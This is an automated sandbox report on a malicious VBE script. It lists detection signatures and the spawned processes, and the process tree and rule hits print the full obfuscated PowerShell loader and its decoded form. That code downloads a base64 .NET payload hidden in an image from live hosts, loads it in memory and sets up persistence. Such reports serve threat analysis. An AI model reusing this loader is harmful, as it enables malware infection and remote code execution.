Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dereac.vbe

Overview

General Information

Sample name:dereac.vbe
Analysis ID:1391738
MD5:3d1704a957f700472678bc83d9d6abcb
SHA1:493d07d67ae25cd468c23ed446341512aa5d8d83
SHA256:8bbe9ce696b004ed6b45f992470d99e093c4d463c7d1bdc80d50f071ab164a85
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5612 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4600 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGMDgTrebgB2DgTreGgDgTreLwBLDgTreEoDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTrecgBlDgTreGQDgTrebgBvDgTreHcDgTrecwByDgTreGUDgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3564 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} } MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 2036 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7072 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4600INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x12fad3:$b2: ::FromBase64String(
  • 0x130396:$b2: ::FromBase64String(
  • 0x131417:$b2: ::FromBase64String(
  • 0x1319cb:$b2: ::FromBase64String(
  • 0x1320a1:$b2: ::FromBase64String(
  • 0x13260e:$b2: ::FromBase64String(
  • 0x185920:$b2: ::FromBase64String(
  • 0x12f938:$b3: ::UTF8.GetString(
  • 0x1301fb:$b3: ::UTF8.GetString(
  • 0x13127c:$b3: ::UTF8.GetString(
  • 0x131830:$b3: ::UTF8.GetString(
  • 0x131f06:$b3: ::UTF8.GetString(
  • 0x132473:$b3: ::UTF8.GetString(
  • 0xa3a85:$s1: -join
  • 0x115947:$s1: -join
  • 0x44804:$s3: reverse
  • 0x44af2:$s3: reverse
  • 0x4520c:$s3: reverse
  • 0x459c5:$s3: reverse
  • 0x4cb70:$s3: reverse
  • 0x4cf8a:$s3: reverse
Process Memory Space: powershell.exe PID: 3564INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x57cb:$b2: ::FromBase64String(
  • 0x5d2d:$b2: ::FromBase64String(
  • 0x70f6:$b2: ::FromBase64String(
  • 0x7660:$b2: ::FromBase64String(
  • 0x7dd4:$b2: ::FromBase64String(
  • 0x84f9:$b2: ::FromBase64String(
  • 0x8b0c:$b2: ::FromBase64String(
  • 0x1fde7:$b2: ::FromBase64String(
  • 0x202d9:$b2: ::FromBase64String(
  • 0x2534a:$b2: ::FromBase64String(
  • 0x2653b:$b2: ::FromBase64String(
  • 0x2ea40:$b2: ::FromBase64String(
  • 0x54b40:$b2: ::FromBase64String(
  • 0x551f4:$b2: ::FromBase64String(
  • 0x580b8:$b2: ::FromBase64String(
  • 0x5861a:$b2: ::FromBase64String(
  • 0x59085:$b2: ::FromBase64String(
  • 0x5630:$b3: ::UTF8.GetString(
  • 0x5b92:$b3: ::UTF8.GetString(
  • 0x6f5b:$b3: ::UTF8.GetString(
  • 0x74c5:$b3: ::UTF8.GetString(

Spreading

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTre
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if 